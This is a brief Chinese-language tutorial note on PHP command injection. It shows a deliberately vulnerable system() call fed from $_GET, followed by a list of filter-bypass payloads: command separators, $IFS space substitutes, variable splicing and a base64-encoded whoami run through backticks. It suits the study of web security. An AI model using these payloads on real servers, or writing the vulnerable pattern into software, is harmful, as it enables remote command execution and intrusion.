(服务器命令)命令注入:
string system(string command,int &return_var)
可以用来执行系统命令并将相应的执行结果输出
<?php
highlight_file(_FILE_);
system('pwd');
system('whoami');
?>
/var/www/html/rce/demo/SystemCode www-data
命令执行绕过:
<?php
highlight_file(_FILE_);
$rce="echo 123";
system($rce.$_GET[1]);
?>
换行符:%0a
回车符:%0d(没成功)
连续指令: ;
后台进程:&
管道符:|
(逻辑?):|| &&
<符号
$IFS
${IFS}
$IFS$9
%09用于url传递
a=l;b=s;$a$b
`echo d2hvYW1p|base64 -D`
base64编码